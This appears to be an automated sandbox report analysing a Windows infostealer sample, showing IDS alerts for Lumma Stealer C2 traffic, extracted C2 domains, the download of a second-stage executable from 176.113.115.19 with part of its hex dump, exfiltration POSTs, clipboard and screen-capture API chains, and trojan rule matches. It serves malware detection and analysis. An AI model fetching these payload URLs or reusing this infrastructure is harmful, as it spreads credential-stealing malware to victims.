        Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.5:49706 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.5:49707 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.5:49709 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.5:49708 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.5:49710 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.5:62422 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49706 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49707 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.112.1:443
        Source: Malware configuration extractorURLs: nearycrepso.shop
        Source: Malware configuration extractorURLs: rabidcowse.shop
        Source: Malware configuration extractorURLs: framekgirus.shop
        Source: Malware configuration extractorURLs: abruptyopsn.shop
        Source: Malware configuration extractorURLs: cloudewahsj.shop
        Source: Malware configuration extractorURLs: noisycuttej.shop
        Source: Malware configuration extractorURLs: tirepublicerj.shop
        Source: Malware configuration extractorURLs: wholersorie.shop
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 05 Jan 2025 07:59:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 05 Jan 2025 07:45:02 GMTETag: "50a00-62af0b081a546"Accept-Ranges: bytesContent-Length: 330240Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1a 24 02 80 5e 45 6c d3 5e 45 6c d3 5e 45 6c d3 e3 0a fa d3 5f 45 6c d3 40 17 e8 d3 7b 45 6c d3 40 17 f9 d3 44 45 6c d3 40 17 ef d3 20 45 6c d3 79 83 17 d3 59 45 6c d3 5e 45 6d d3 24 45 6c d3 40 17 e6 d3 5f 45 6c d3 40 17 f8 d3 5f 45 6c d3 40 17 fd d3 5f 45 6c d3 52 69 63 68 5e 45 6c d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b0 30 64 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1c 04 00 00 52 01 00 00 00 00 00 5f 44 00 00 00 10 00 00 00 30 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 2c 5e 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 22 04 00 50 00 00 00 00 e0 04 00 60 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 1b 04 00 00 10 00 00 00 1c 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c ac 00 00 00 30 04 00 00 60 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 c8 00 00 00 e0 04 00 00 8a 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
        Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
        Source: Joe Sandbox ViewIP Address: 176.113.115.19 176.113.115.19
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 176.113.115.19:80
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.112.1:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 104.21.56.70:443
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cloudewahsj.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: cloudewahsj.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1UHHTO75RAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12782Host: cloudewahsj.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9CIY2GISK9V00UOMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15060Host: cloudewahsj.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JRXDVKEB4T0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20520Host: cloudewahsj.shop
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
        Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
        Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
        Source: global trafficDNS traffic detected: DNS query: post-to-me.com
        Source: global trafficDNS traffic detected: DNS query: cloudewahsj.shop
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cloudewahsj.shop
        Source: K27Yg4V48M.exe, 00000000.00000003.2046141104.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000003.4317071653.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
        Source: K27Yg4V48M.exe, 00000000.00000002.4481263101.000000000068B000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000003.2046141104.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000003.4317071653.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe.
        Source: K27Yg4V48M.exe, 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
        Source: K27Yg4V48M.exe, 00000000.00000002.4481263101.000000000068B000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000003.2046141104.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000003.4317071653.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe;
        Source: 1831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: 1831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: 1831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: 1831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: 1831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: 1831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: 1831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: 1831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: 1831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
        Source: 1831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: 1831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: 1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: 1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: 1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: 1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: 1831.tmp.exe, 00000002.00000002.2277491965.00000000004B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/
        Source: 1831.tmp.exe, 00000002.00000003.2077120697.00000000004B5000.00000004.00000020.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000002.2277491965.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/api
        Source: 1831.tmp.exe, 00000002.00000003.2077120697.00000000004B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/apie;
        Source: 1831.tmp.exe, 00000002.00000002.2277491965.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/apio
        Source: 1831.tmp.exe, 00000002.00000002.2277491965.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/apiz
        Source: 1831.tmp.exe, 00000002.00000003.2077120697.00000000004B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/d
        Source: 1831.tmp.exe, 00000002.00000003.2077120697.00000000004B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/q
        Source: 1831.tmp.exe, 00000002.00000003.2125193195.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2124952451.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2124408100.0000000002F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop:443/api
        Source: 1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: 1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: 1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: K27Yg4V48M.exe, 00000000.00000003.4317071653.0000000000673000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000002.4481263101.0000000000673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
        Source: K27Yg4V48M.exe, 00000000.00000003.4317071653.0000000000673000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000002.4481263101.0000000000673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/p
        Source: K27Yg4V48M.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
        Source: K27Yg4V48M.exe, 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
        Source: K27Yg4V48M.exe, 00000000.00000003.4317071653.0000000000673000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000002.4481263101.0000000000673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
        Source: K27Yg4V48M.exe, 00000000.00000003.4317071653.0000000000673000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000002.4481263101.0000000000673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE3
        Source: 1831.tmp.exe, 00000002.00000003.2109258315.0000000003205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: 1831.tmp.exe, 00000002.00000003.2109258315.0000000003205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: 1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: 1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: 1831.tmp.exe, 00000002.00000003.2109258315.0000000003205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
        Source: 1831.tmp.exe, 00000002.00000003.2109258315.0000000003205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
        Source: 1831.tmp.exe, 00000002.00000003.2109258315.0000000003205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
        Source: 1831.tmp.exe, 00000002.00000003.2109258315.0000000003205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: 1831.tmp.exe, 00000002.00000003.2109258315.0000000003205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
        Source: 1831.tmp.exe, 00000002.00000003.2109258315.0000000003205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02101942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_02101942
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00437C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00437C10

        System Summary

        barindex
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000000.00000002.4481462096.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000002.00000002.2277951970.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
